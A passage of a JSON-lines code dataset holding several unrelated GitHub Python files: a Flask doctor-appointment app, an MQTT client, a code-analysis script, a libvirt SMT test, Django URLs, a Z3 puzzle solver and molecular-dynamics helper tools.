form=form)\n\n@app.route(\"/logout\")\ndef logout():\n global current_user\n if current_user == None:\n flash(\"No one is signed in\")\n else:\n current_user = None\n return redirect(url_for('index'))\n\n@app.route(\"/doctors//save\")\ndef save(npi):\n if not current_user:\n flash(\"Please login to save a doctor first\")\n return redirect(url_for('login'))\n else:\n # Push to database\n args = (current_user, npi)\n g.conn.execute(\"INSERT INTO saves VALUES (%s, %s)\", args)\n return redirect(\"/doctors/\" + npi)\n\n@app.route('/doctors//save/delete', methods=['GET','DELETE'])\ndef deleteSave(npi):\n\n if not current_user:\n flash(\"Please login to remove this doctor from your saved list\")\n return redirect(\"/login\")\n \n # Push delete to database\n g.conn.execute(\"DELETE FROM saves WHERE npi=%s AND uni=%s\", npi, current_user)\n return redirect(\"/doctors/\" + npi)\n\n@app.route('/apts/')\ndef apt(apt_id):\n\n cursor = g.conn.execute(\"SELECT * FROM schedules WHERE apt_id=%s AND uni=%s\", apt_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not current_user or not student:\n flash(\"You do not have access to other students' appointment information\")\n return redirect(url_for('users'))\n\n cursor = g.conn.execute(\"SELECT * FROM studentPatients AS P, doctors AS D, appointments AS A, schedules AS S, works_at AS W WHERE W.cms = S.cms AND P.uni = S.uni AND D.npi = S.npi AND W.npi = D.npi AND A.apt_id=S.apt_id AND A.apt_id=%s\", apt_id)\n apt_result = cursor.fetchone()\n cursor.close()\n\n # Get Hospital information\n cursor = g.conn.execute(\"SELECT * FROM hospitals AS H, schedules as S WHERE H.cms = S.cms AND S.npi = %s\", apt_result['npi'])\n hospital_info = cursor.fetchone()\n cursor.close()\n context = dict(data = apt_result, hospital = hospital_info)\n\n return render_template(\"apt.html\", **context)\n\n@app.route('/newApt/', methods=['POST', 'GET'])\ndef newApt(npi):\n\n if not current_user:\n flash(\"Please login to book an appointment\")\n return redirect(\"/login\")\n\n apt_date = None\n apt_time = None\n concern_description = None\n\n form = NewAptForm()\n\n if form.validate_on_submit():\n apt_date = form.apt_date.data\n apt_time = form.apt_time.data\n concern_description = form.concern_description.data\n\n form.apt_date.data = ''\n form.apt_time.data = ''\n form.concern_description.data = ''\n\n # Get new appointment id\n apt_id = str(add_to_apt_count())\n\n args_apt = (apt_id, apt_date, apt_time, concern_description)\n g.conn.execute(\"INSERT INTO appointments VALUES (%s, %s, %s, %s)\", args_apt)\n\n # Get Hospital information\n cursor = g.conn.execute(\"SELECT * FROM hospitals AS H, schedules as S WHERE H.cms = S.cms AND S.npi = %s\", npi)\n hospital_info = cursor.fetchone()\n cursor.close()\n\n args_schedules = (npi, hospital_info['cms'], apt_id, current_user)\n g.conn.execute(\"INSERT INTO schedules VALUES (%s, %s, %s, %s)\", args_schedules)\n\n return redirect(\"/apts/\" + apt_id)\n\n return render_template(\"newApt.html\",\n apt_date = apt_date,\n apt_time = apt_time,\n concern_description = concern_description,\n form=form)\n\ndef add_to_apt_count():\n cursor = g.conn.execute(\"SELECT max(apt_id) FROM appointments\")\n count = cursor.fetchone()[0] + 1\n cursor.close()\n return count\n\n@app.route('/apts//edit', methods=['POST', 'GET'])\ndef editApt(apt_id):\n\n if not current_user:\n flash(\"Please login to edit an appointment\")\n return redirect(\"/login\")\n\n cursor = g.conn.execute(\"SELECT * FROM schedules WHERE apt_id=%s AND uni=%s\", apt_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not student:\n flash(\"You do not have access to edit other students' appointments\")\n return redirect(\"/users/\" + current_user)\n\n # Get this apts's information\n cursor = g.conn.execute(\"SELECT * FROM appointments WHERE apt_id=%s\", apt_id)\n apt = cursor.fetchone()\n cursor.close()\n\n # Populate form with current information\n form = EditAptForm(request.form, obj = apt)\n\n if form.validate_on_submit():\n # Grab new information\n apt_date = form.apt_date.data\n apt_time = form.apt_time.data\n concern_description = form.concern_description.data\n\n # Set fields empty again\n form.apt_date.data = ''\n form.apt_time.data = ''\n form.concern_description.data = ''\n\n # Push edits to database\n g.conn.execute(\"UPDATE appointments SET apt_date=%s, apt_time=%s, concern_description=%s WHERE apt_id=%s\", apt_date, apt_time, concern_description, apt_id)\n\n flash(\"Appointment Updated Successfully\")\n return redirect(\"/apts/\" + str(apt['apt_id']))\n\n return render_template(\"editApt.html\", form=form)\n\n@app.route('/apts//delete', methods=['GET','DELETE'])\ndef deleteApt(apt_id):\n\n if not current_user:\n flash(\"Please login to delete an appointment\")\n return redirect(\"/login\")\n\n cursor = g.conn.execute(\"SELECT * FROM schedules WHERE apt_id=%s AND uni=%s\", apt_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not student:\n flash(\"You do not have access to delete other students' appointments\")\n return redirect(\"/users/\" + current_user)\n \n # Push delete to database\n g.conn.execute(\"DELETE FROM schedules WHERE apt_id=%s\", apt_id)\n g.conn.execute(\"DELETE FROM appointments WHERE apt_id=%s\", apt_id)\n\n flash(\"Appointment Cancelled\")\n return redirect(\"/users/\" + current_user)\n\n# Pass stuff to base.html; will pass thing\n@app.context_processor\ndef base():\n form = SearchForm()\n return dict(form=form)\n\n@app.route('/search', methods=['POST'])\ndef search():\n form = SearchForm()\n \n docs = []\n\n # Get data from search box\n query = form.searched.data\n query = query.strip()\n\n if(len(query) == 0):\n return redirect('/doctors')\n\n if form.validate_on_submit():\n\n # Query by specialty or description\n q = f'%{query}%'\n cursor = g.conn.execute(\"SELECT * FROM doctors WHERE first_name ILIKE %s OR last_name ILIKE %s OR job_title ILIKE %s OR about ILIKE %s\", q, q, q, q)\n for result in cursor:\n if (result not in docs):\n docs.append(result)\n cursor.close()\n\n docs_set = list(set(docs))\n context = dict(data = docs_set)\n\n return render_template(\"search_doc.html\", **context, form=form, searched=query)\n\n\nif __name__ == \"__main__\":\n import click\n\n @click.command()\n @click.option('--debug', is_flag=True)\n @click.option('--threaded', is_flag=True)\n @click.argument('HOST', default='0.0.0.0')\n @click.argument('PORT', default=8111, type=int)\n def run(debug, threaded, host, port):\n\n HOST, PORT = host, port\n print(\"running on %s:%d\" % (HOST, PORT))\n app.run(host=HOST, port=PORT, debug=debug, threaded=threaded)\n\n run()\n","repo_name":"ayshajamjam/columbiaInsurance","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"13333336506","text":"import paho.mqtt.client as mqtt\r\nimport time,logging\r\n\r\nbroker=\"test.mosquitto.org\"\r\nport=1883\r\n\r\nCLEAN_SESSION=True\r\nlogging.basicConfig(level=logging.INFO) \r\n\r\ndef on_subscribe(client, userdata, mid, granted_qos): \r\n time.sleep(1)\r\n logging.info(\"sub acknowledge message id=\"+str(mid))\r\n pass\r\n\r\ndef on_disconnect(client, userdata,rc=0):\r\n logging.info(\"DisConnected result code \"+str(rc))\r\n\r\n\r\ndef on_connect(client, userdata, flags, rc):\r\n logging.info(\"Connected flags\"+str(flags)+\"result code \"+str(rc))\r\n\r\n\r\ndef on_message(client, userdata, message):\r\n msg=str(message.payload.decode(\"utf-8\"))\r\n print(\"message received \" +msg)\r\n \r\ndef on_publish(client, userdata, mid):\r\n logging.info(\"message published \" +str(mid))\r\n\r\ntopic1 =\"house/client_b\"\r\nclient= mqtt.Client(\"ClientB\",False) \r\n\r\nclient.on_subscribe = on_subscribe \r\nclient.on_disconnect = on_disconnect \r\nclient.on_connect = on_connect \r\nclient.on_message=on_message\r\nclient.connect(broker,port) #establish connection\r\ntime.sleep(1)\r\nclient.loop_start()\r\nclient.subscribe(\"house/client_a\")\r\ncount=1\r\nwhile True: \r\n print(\"publishing on topic \",topic1)\r\n msg=\"message \" +str(count) + \" from client B\"\r\n #client.publish(topic1,msg)\r\n count +=1\r\n time.sleep(5)\r\nclient1.disconnect()\r\n\r\nclient1.loop_stop()\r\n\r\n","repo_name":"Youcef0012/MQTT","sub_path":"Python/clientb.py","file_name":"clientb.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"37162556243","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 20 13:18:13 2018\r\n\r\n@author: Laine Rumreich\r\n\r\nProgram to read in a text file wih FEH SDP code and analyze it for coding \r\ntechniques, complexity, and good and bad coding practices. Then, print \r\nthe results to an excel spreadsheet.\r\n\"\"\" \r\n\r\n# Python imports\r\nimport os\r\nfrom openpyxl import Workbook\r\n\r\n# Local imports\r\nfrom printOutput import printOutput\r\nfrom parseFile import parseFile\r\nfrom writeHeader import writeHeader\r\nfrom cleanFile import cleanFile \r\n\r\ndef main():\r\n \r\n # Define excel spreadsheet variables\r\n lineNum = 2 # The line the current output should be written on\r\n lineString = \"A\"\r\n \r\n # Ask the user for a text input file that contains all the filenames for the \r\n # SDP text files to analyze\r\n nameList = input(\"Enter a file with the names of the files to analyze: \")\r\n \r\n # Open the .txt data file containing list of filenames\r\n if(not os.path.isfile(nameList)):\r\n print(\"No such file or directory: '\" + nameList + \"'\")\r\n return\r\n nameFile = open(nameList, 'r') \r\n name = nameFile.readline()\r\n \r\n # Open an excel spreadsheet to print the output\r\n wb = Workbook() # Open the output file\r\n output = wb.active # Get the active worksheet\r\n writeHeader(output) # Write the header to the output file\r\n \r\n # Read in each file name in the nameFile, and run the program on it\r\n while(name):\r\n # Open the current file\r\n fileName = name[:-1] # Consume newline character\r\n fileName = \"Data\" + '\\\\' + fileName + \".txt\"\r\n if(not os.path.isfile(fileName)):\r\n print(fileName, \" is not a valid file.\")\r\n name = nameFile.readline()\r\n continue\r\n dataFile = open(fileName, 'r')\r\n \r\n # Compute which line the current output should go on\r\n lineString = lineString[0]\r\n lineString = lineString + str(lineNum)\r\n \r\n # Print the name of the current file\r\n output[lineString] = name\r\n \r\n # Clean up the current file for easier analysis\r\n cleanFile(dataFile, fileName)\r\n dataFile.close()\r\n \r\n # Access the edited data file created in cleanFile, to be deleted later\r\n editedDataFileName = fileName[:5] + \"edited\" + fileName[5:]\r\n editedDataFile = open(editedDataFileName, 'r')\r\n \r\n counts = {'lines': 0,\r\n 'comments': 0,\r\n 'forLoops': 0,\r\n 'whileLoops': 0,\r\n 'nestedLoops': 0,\r\n 'highestNestedLoop': 0, #TODO\r\n 'ifElse': 0,\r\n 'nestedIfs': 0,\r\n 'time': 0,\r\n 'rand': 0,\r\n 'input': 0,\r\n 'plot': 0,\r\n 'print': 0,\r\n 'switch': 0,\r\n 'cyclomatic': 0,\r\n 'cyclAvg': 0,\r\n 'cyclMed': 0,\r\n 'halsteadVolume': 0,\r\n 'halsteadDifficulty': 0,\r\n 'halsteadEffort': 0,\r\n 'maintainability': 0,\r\n 'userFunc': 0,\r\n 'addFunc': 0} #TODO\r\n \r\n # Read in the data from the input file and perform the primary analysis\r\n parseFile(editedDataFileName, editedDataFile, counts)\r\n \r\n # Print the results of the analysis to the output excel file\r\n printOutput(output, lineNum, counts)\r\n print(\"Finished reading in file: \", fileName)\r\n lineNum += 1\r\n \r\n # Close the current (edited) input data file\r\n editedDataFile.close()\r\n \r\n # Remove the edited file\r\n os.remove(editedDataFileName)\r\n \r\n # Read in the next name from the nameFile\r\n name = nameFile.readline()\r\n \r\n # Close the user-entered file of program names \r\n nameFile.close()\r\n \r\n # Save the output file\r\n wb.save(\"output.xlsx\")\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n print(\"Done with program. Exiting...\")\r\n","repo_name":"LaineRumreich/SDP-analysis","sub_path":"mainSDPparser.py","file_name":"mainSDPparser.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"33112029549","text":"# ============================================ file handling slide\n\n# Stop suffering each other\n# There are too many cargo items, it is placed in a text file.\n# The file includes cargo item name and its weight\n# Load all cargo items from text file to store it in a list of dictionaries\n\ncargo_items = []\n\nwith open('cargo.txt', 'r+') as file:\n for line in file:\n line_extract = line.split('=')\n item = {'name': line_extract[0], 'cargo_weight': float(line_extract[1])}\n cargo_items.append(item)\n\nprint(cargo_items)\n","repo_name":"linhhonblade/hello-python","sub_path":"practices/solutions/practice5.py","file_name":"practice5.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30436117129","text":"import time\nimport logging as log\nimport re\n\nfrom avocado.utils import process\nfrom avocado.utils import astring\n\nfrom virttest.libvirt_xml import vm_xml\nfrom virttest import utils_package\nfrom virttest import virt_vm\n\n\n# Using as lower capital is not the best way to do, but this is just a\n# workaround to avoid changing the entire file.\nlogging = log.getLogger('avocado.' + __name__)\n\n\ndef run(test, params, env):\n \"\"\"\n libvirt smt test:\n 1) prepare the guest with given topology\n 2) Start and login to the guest\n 3) Check for ppc64_cpu --smt and smt should be on\n 4) ppc64_cpu --smt=off and smt should be off\n 5) ppc64_cpu --smt=on and smt should be on\n 6) Check for core present using ppc64_cpu\n 7) Check for online core using ppc64_cpu\n 8) Check for lscpu for thread, core, socket info updated properly\n 9) Change the number of cores and check in lscpu\n\n :param test: QEMU test object\n :param params: Dictionary with the test parameters\n :param env: Dictionary with test environment.\n \"\"\"\n error_count = 0\n\n def smt_check(vm, cmd, output, extra=None, ignorestatus=False):\n \"\"\"\n Run and check SMT command inside guest\n\n :param vm: VM object\n :param cmd: Given smt command\n :param output: Expected output\n :param extra: Extra output to be added\n :param ignorestatus: True or False to ignore status\n :return: error count\n \"\"\"\n err_count = 0\n session = vm.wait_for_login()\n actual_output = session.cmd_output(cmd).strip()\n return_output = session.cmd_output('echo $?').strip()\n if extra:\n expected_output = output + extra\n else:\n expected_output = output\n if expected_output != actual_output:\n logging.error(\"Command: %s failed\\nActual output: %s\\nExpected \"\n \"output: %s\", cmd, actual_output, expected_output)\n if int(return_output) == 0 and not ignorestatus:\n logging.error(\"Command: %s returned zero\"\n \"\\n Expecting a non zero number\", cmd)\n err_count = 1\n else:\n if int(return_output) != 0 and not ignorestatus:\n logging.error(\"Command: %s returned non-zero\"\n \"\\n Expecting zero\", cmd)\n err_count += 1\n else:\n logging.debug(\"Command: %s ran successfully\", cmd)\n session.close()\n return err_count\n\n def cpus_info(vm, env=\"guest\"):\n \"\"\"\n To get host cores, threads, sockets in the system\n\n :param vm: VM object\n :param env: guest or host\n :return: cpu sockets, cores, threads info as list\n \"\"\"\n if \"guest\" in env:\n session = vm.wait_for_login()\n output = session.cmd_output(\"lscpu\")\n else:\n output = astring.to_text(process.system_output(\"lscpu\", shell=True))\n no_cpus = int(re.findall('CPU\\(s\\):\\s*(\\d+)', str(output))[0])\n no_threads = int(re.findall('Thread\\(s\\)\\sper\\score:\\s*(\\d+)', str(output))[0])\n no_cores = int(re.findall('Core\\(s\\)\\sper\\ssocket:\\s*(\\d+)', str(output))[0])\n no_sockets = int(re.findall('Socket\\(s\\):\\s*(\\d+)', str(output))[0])\n cpu_info = [no_cpus, no_threads, no_cores, no_sockets]\n if \"guest\" in env:\n session.close()\n return cpu_info\n\n vm_name = params.get(\"main_vm\")\n smt_chk_cmd = params.get(\"smt_chk_cmd\", \"ppc64_cpu --smt\")\n smt_on_cmd = params.get(\"smt_on_cmd\", \"ppc64_cpu --smt=on\")\n smt_off_cmd = params.get(\"smt_off_cmd\", \"ppc64_cpu --smt=off\")\n smt_core_pst_cmd = params.get(\"smt_core_present_cmd\",\n \"ppc64_cpu --cores-present\")\n smt_core_on_cmd = params.get(\"smt_core_on_cmd\", \"ppc64_cpu --cores-on\")\n smt_chk_on_output = params.get(\"smt_chk_on_output\", \"SMT is on\")\n smt_chk_off_output = params.get(\"smt_chk_off_output\", \"SMT is off\")\n smt_core_pst_output = params.get(\"smt_core_pst_output\",\n \"Number of cores present =\")\n smt_core_on_output = params.get(\"smt_core_on_output\",\n \"Number of cores online =\")\n smt_threads_per_core_cmd = params.get(\"smt_threads_per_core_cmd\",\n \"ppc64_cpu --threads-per-core\")\n smt_threads_per_core_output = params.get(\"smt_threads_per_core_ouput\",\n \"Threads per core:\")\n status_error = params.get(\"status_error\", \"no\") == \"yes\"\n ignore_status = params.get(\"ignore_status\", \"no\") == \"yes\"\n\n smt_number = params.get(\"smt_number\", None)\n max_vcpu = current_vcpu = int(params.get(\"smt_smp\", 8))\n vm_cores = int(params.get(\"smt_vcpu_cores\", 8))\n vm_threads = int(params.get(\"smt_vcpu_threads\", 1))\n vm_sockets = int(params.get(\"smt_vcpu_sockets\", 1))\n vm = env.get_vm(vm_name)\n\n output = astring.to_text(process.system_output(smt_threads_per_core_cmd, shell=True))\n try:\n host_threads = int(re.findall('Threads per core:\\s+(\\d+)', output)[0])\n except Exception as err:\n test.cancel(\"Unable to get the host threads\\n %s\" % err)\n\n logging.info(\"Guest: cores:%d, threads:%d, sockets:%d\", vm_cores,\n vm_threads, vm_sockets)\n try:\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n org_xml = vmxml.copy()\n vm.destroy()\n # Initial Setup of vm\n vmxml.set_vm_vcpus(vm_name, max_vcpu, current_vcpu,\n vm_sockets, vm_cores, vm_threads,\n add_topology=True)\n try:\n vm.start()\n if status_error:\n test.fail(\"VM Started with invalid thread %s\" % vm_threads)\n except virt_vm.VMStartError as detail:\n if not status_error:\n test.fail(\"VM failed to start %s\" % detail)\n\n if not status_error:\n # try installing powerpc-utils in guest if not skip\n try:\n session = vm.wait_for_login()\n utils_package.package_install([\"powerpc-utils\"], session, 360)\n session.close()\n except Exception as err:\n test.cancel(\"Unable to install powerpc-utils package in guest\\n %s\" % err)\n # Changing the smt number\n if smt_number:\n smt_chk_cmd_mod = \"%s=%s\" % (smt_chk_cmd, smt_number)\n error_count += smt_check(vm, smt_chk_cmd_mod, \"\")\n\n guest_cpu_details = cpus_info(vm)\n # Step 10: Check for threads, cores, sockets\n if vm_cores != guest_cpu_details[2]:\n logging.error(\"Number of cores mismatch:\\nExpected number of \"\n \"cores: %s\\nActual number of cores: %s\",\n vm_cores, guest_cpu_details[2])\n error_count += 1\n if smt_number:\n threads = int(smt_number)\n else:\n threads = vm_threads\n if threads != guest_cpu_details[1]:\n logging.error(\"Number of threads mismatch:\\nExpected number of \"\n \"threads: %s\\nActual number of threads: %s\",\n threads, guest_cpu_details[1])\n error_count += 1\n if vm_sockets != guest_cpu_details[3]:\n logging.error(\"Number of sockets mismatch:\\nExpected number of \"\n \"sockets: %s\\nActual number of sockets: %s\",\n vm_sockets, guest_cpu_details[3])\n error_count += 1\n\n error_count += smt_check(vm, smt_chk_cmd, smt_chk_on_output,\n ignorestatus=ignore_status)\n session = vm.wait_for_login()\n session.cmd_output(smt_off_cmd)\n session.close()\n error_count += smt_check(vm, smt_chk_cmd, smt_chk_off_output,\n ignorestatus=ignore_status)\n cores = vm_cores * vm_sockets\n extra = \" %s\" % cores\n error_count += smt_check(vm, smt_core_pst_cmd,\n smt_core_pst_output, extra)\n extra = \" %s\" % cores\n error_count += smt_check(vm, smt_core_on_cmd, smt_core_on_output, extra)\n extra = \" %s\" % vm_threads\n error_count += smt_check(vm, smt_threads_per_core_cmd,\n smt_threads_per_core_output, extra)\n\n # Changing the cores\n cores -= 1\n while cores > 1:\n smt_core_on_cmd_mod = \"%s=%s\" % (smt_core_on_cmd, cores)\n error_count += smt_check(vm, smt_core_on_cmd_mod, \"\")\n extra = \" %s\" % cores\n error_count += smt_check(vm, smt_core_on_cmd,\n smt_core_on_output, extra)\n guest_cpu_details = cpus_info(vm)\n if cores != (guest_cpu_details[3] * guest_cpu_details[2]):\n logging.error(\"The core changes through command: %s not \"\n \"reflected in lscpu output\", smt_core_on_cmd_mod)\n error_count += 1\n cores -= 1\n # wait for sometime before next change of cores\n time.sleep(5)\n\n if error_count > 0:\n test.fail(\"The SMT feature has issue, please consult \"\n \"previous errors more details\")\n finally:\n org_xml.sync()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/smt.py","file_name":"smt.py","file_ext":"py","file_size_in_byte":9591,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"7843449990","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('registerNote/', views.registerNote),\n path('editNote/', views.editNote),\n path('editingNote/', views.editingNote),\n path('deleteNote/', views.deleteNote)\n]","repo_name":"alexpintodiaz/NotesApp","sub_path":"Applications/Notes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28725734435","text":"import pprint\nfrom z3 import *\n\nclass Graph:\n # pin_pairs list of pairs(pair is a list of size 2 of tuples);\n def __init__(self, m : int, pin_pairs : list):\n self.m = m\n self.pin_pairs = pin_pairs\n\n self.graph = Graph.input_to_graph(m, pin_pairs)\n\n\n # returns a list \"edges\" of lists of size 2;\n # where edges[x][0] is the start vertex of the edge x and\n # where edges[x][1] is the terminal vertex of the edge x;\n def get_all_edges(self) -> list:\n edges = []\n for curr_vertex, outgoing_vertices in self.graph.items():\n for out_vertex in outgoing_vertices:\n edges.append([curr_vertex, out_vertex])\n\n return edges\n\n def get_incoming_edges(self, vertex) -> list:\n \n in_vertices = self.get_incoming_vertices(vertex)\n in_edges = [ [in_vertices[i], vertex] for i in range(len(in_vertices)) ]\n\n return in_edges\n\n def get_outgoing_edges(self, vertex) -> list:\n\n out_vertices = self.get_outgoing_vertices(vertex)\n out_edges = [ [vertex, out_vertices[i]] for i in range(len(out_vertices)) ]\n\n return out_edges\n\n def get_incoming_vertices(self, vertex) -> list:\n in_vertices = []\n for curr_vertex, outgoing_vertices in self.graph.items():\n for out_vertex in outgoing_vertices:\n if out_vertex == vertex:\n in_vertices.append(curr_vertex)\n \n return in_vertices\n\n\n def get_outgoing_vertices(self, vertex) -> list:\n\n return self.graph[vertex]\n\n\n def print_as_grid(self):\n arr = [['.' for i in range(self.m)] for j in range(self.m)]\n\n # pin_pairs = [ \n # [(1, 0), (3, 4), 'a'],\n # [(2, 0), (4, 5), 'b'],\n # [(1, 4), (4, 2), 'c']\n # ]\n for pin_pair in self.pin_pairs:\n arr[pin_pair[0][0]][pin_pair[0][1]] = arr[pin_pair[1][0]][pin_pair[1][1]] = pin_pair[2]\n\n for i in range(len(arr)):\n for j in range(len(arr[0])):\n print(arr[i][j], \" \", end='')\n print()\n print()\n\n\n def print_as_graph(self):\n pprint.pprint(self.graph)\n\n\n @staticmethod\n def input_to_graph(m : int, pin_pairs : list):\n\n graph = {}\n\n for x in range(m):\n for y in range(m):\n tempSet = []\n if x > 0: tempSet.append((x - 1, y))\n if y > 0: tempSet.append((x, y - 1))\n if x < m - 1: tempSet.append((x + 1, y))\n if y < m - 1: tempSet.append((x, y + 1))\n graph[(x, y)] = tempSet\n\n return graph\n\n\n\nclass FreeFlow2Sat:\n def __init__(self, graph : Graph):\n self.graph = graph\n\n self.__construct_variables()\n self.__construct_formula()\n\n\n def __construct_formula(self):\n self.formula = Solver()\n\n self.path2sat(self.graph.pin_pairs[0])\n\n answer = self.formula.check()\n model = self.formula.model()\n\n print(answer)\n print(model)\n # self.graph.print_as_grid_and_path(model)\n\n \n # pin pair - list of size 2 of tuples\n def path2sat(self, pin_pair : list):\n#########################################\n s = pin_pair[0] # start vertex\n t = pin_pair[1] # terminal vertex\n label = pin_pair[2]\n\n # Adding clauses: (ru -> (rx1 or rx2 or ... or rxk)),\n # where ru is varible for graph vertex,\n # where rx1 ... rxk are predecessors of ru on the path;\n for vertex, _ in self.graph.graph.items():\n # Ignore start vertex since it does not have any predecessors on the path;\n if vertex == s:\n continue\n\n in_vertices = self.graph.get_incoming_vertices(vertex)\n\n # Implication clause: vertex -> in_vertex[0] or in_vertex[1] or ... or in_vertex[k];\n clause = []\n for in_vertex in in_vertices:\n clause.append(self.vvars[in_vertex][label])\n\n # self.__enforce_exactly_one(clause)\n clause.append(Not(self.vvars[vertex][label]))\n\n # Adding the implication clause to the formula;\n self.formula.add(Or(clause))\n\n # Adding start and terminal vertices as single clausses;\n self.formula.add([self.vvars[s][label]])\n self.formula.add([self.vvars[t][label]])\n#########################################\n\n for vertex, _ in self.graph.graph.items():\n in_edges = self.graph.get_incoming_edges(vertex)\n out_edges = self.graph.get_outgoing_edges(vertex)\n\n if vertex != s:\n in_edges_clause = []\n for in_edge in in_edges:\n in_edges_clause.append( self.evars[in_edge[0]][in_edge[1]][label] )\n \n self.__enforce_exactly_one(in_edges_clause)\n in_edges_clause.append(Not(self.vvars[vertex][label]))\n self.formula.add(Or(in_edges_clause))\n else:\n for in_edge in in_edges:\n self.formula.add( Not(self.evars[in_edge[0]][in_edge[1]][label]) )\n\n\n if vertex != t:\n out_edges_clause = []\n for out_edge in out_edges:\n out_edges_clause.append( self.evars[out_edge[0]][out_edge[1]][label] )\n\n self.__enforce_exactly_one(out_edges_clause)\n out_edges_clause.append(Not(self.vvars[vertex][label]))\n self.formula.add(Or(out_edges_clause))\n else:\n for out_edge in out_edges:\n self.formula.add( Not(self.evars[out_edge[0]][out_edge[1]][label]) ) \n\n # vertex -> in_edge[0] or in_edge[1] or ... or in_edge[k]; already added\n # exactly_one(in_vertex[0], in_vertex[1], ..., in_vertex[k]);\n # vertex -> out_vertex[0] or out_vertex[1] or ... or out_vertex[k]; // todo\n # exactly_one(out_vertex[0], out_vertex[1], ..., out_vertex[k]);\n\n # if s => deal only with out vertices AND make sure all vars for in edges = 0;\n # if t => deal only with in vertices AND make sure all vars for out edges = 0;\n\n\n\n \n # Creates 2 dictionaries - vvars and evars;\n # vvars stores variables that encode vertices -> vvars[vertex][pinPairID];\n # For example, vertex is a tuple (0, 1) and pinPairID is 'a';\n # evars stores variables that encode edges -> evers[vertex_from][vertex_to][pinPairID];\n def __construct_variables(self):\n self.vvars = {}\n\n for vertex, _ in self.graph.graph.items():\n if not vertex in self.vvars:\n self.vvars[vertex] = {}\n\n for pin_pair in self.graph.pin_pairs:\n pin_pair_label = pin_pair[2]\n self.vvars[vertex][pin_pair_label] = Bool(str(vertex[0]) + \",\" + str(vertex[1]) + \";\" + pin_pair_label)\n\n self.evars = {}\n\n all_edges = self.graph.get_all_edges()\n\n for edge in all_edges:\n s = edge[0] # start vertex of an edge;\n t = edge[1] # terminal vertex of an edge;\n\n if not s in self.evars:\n self.evars[s] = {}\n\n self.evars[s][t] = {}\n\n for pin_pair in self.graph.pin_pairs:\n pin_pair_label = pin_pair[2]\n self.evars[s][t][pin_pair_label] = Bool(str(s[0]) + \",\" + str(s[1]) + \"; \" + str(t[0]) + \",\" + str(t[1]) + \"; \" + pin_pair_label)\n\n\n def __enforce_exactly_one(self, variables: list):\n clauses = []\n\n for i in range(len(variables)):\n for j in range(i + 1, len(variables)):\n # variables[i] -> !variables[j]\n clauses += [[ Not(variables[i]), Not(variables[j]) ]]\n\n for clause in clauses:\n self.formula.add(Or(clause))\n\n\n\nif __name__ == \"__main__\":\n m = 3\n \n pin_pairs = [ \n [(0, 0), (1, 2), 'a'],\n [(2, 0), (2, 2), 'b']\n ]\n\n graph = Graph(m, pin_pairs)\n graph.print_as_grid()\n\n graph.print_as_graph()\n\n sol = FreeFlow2Sat(graph)\n","repo_name":"lmarqu8/PuzzleSat","sub_path":"sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5825500686","text":"#! /usr/bin/env python3\n\"\"\"\nTools used in LETHE\n\"\"\"\n\nimport MDAnalysis as mda\nimport scipy\nimport pyemma\nimport numpy as np\n\n\ndef create_pairIndices_from_pairNames(pdbfilename, pairNames):\n \"\"\"Get the indices from the names\n\n Parameters\n ----------\n pdbfilename : str\n Path to the .pdb file\n pairNames : list\n List of string containing the different pair name\n\n Returns\n -------\n pairsListIndices : list\n List containing the different indices\n \"\"\"\n refu = mda.Universe(pdbfilename)\n pairsListIndices = []\n for pairname in pairNames:\n print(f\"Search indices for the pair {pairname}\")\n atomName1 = pairname.split(\"-\")[0]\n res1 = atomName1.split(\"_\")[0]\n name1 = atomName1.split(\"_\")[1]\n\n atomName2 = pairname.split(\"-\")[1]\n res2 = atomName2.split(\"_\")[0]\n name2 = atomName2.split(\"_\")[1]\n\n # print(name1, res1)\n index1 = refu.select_atoms(f\"name {name1} and resid {res1}\").indices\n # print(name2, res2)\n index2 = refu.select_atoms(f\"name {name2} and resid {res2}\").indices\n\n if len(index1) == 1 and len(index2) == 1:\n pairsListIndices.append([index1[0], index2[0]])\n\n else:\n print(\n f\"WARNING : the pair defined by the name {pairname} do not lead to a pair on indices\"\n )\n\n print(f\"Found indices: {pairsListIndices}\")\n\n return np.array(pairsListIndices)\n\ndef create_pairIndices_from_txt(pdbfilename, pairNames):\n \"\"\"Get the indices from the names\n\n Parameters\n ----------\n pdbfilename : str\n Path to the .pdb file\n pairNames : np.array\n Array containing the different residue number\n\n Returns\n -------\n pairsListIndices : list\n List containing the different indices\n \"\"\"\n refu = mda.Universe(pdbfilename)\n pairsListIndices = []\n for pairname in pairNames:\n print(f\"Search indices for the pair {pairname}\")\n res1 = pairname[0]\n name1 = \"CA\"\n\n res2 = pairname[1]\n name2 = \"CA\"\n\n # print(name1, res1)\n index1 = refu.select_atoms(f\"name {name1} and resid {res1}\").indices\n # print(name2, res2)\n index2 = refu.select_atoms(f\"name {name2} and resid {res2}\").indices\n\n if len(index1) == 1 and len(index2) == 1:\n pairsListIndices.append([index1[0], index2[0]])\n\n else:\n print(\n f\"WARNING : the pair defined by the name {pairname} do not lead to a pair on indices\"\n )\n\n print(f\"Found indices: {pairsListIndices}\")\n\n return 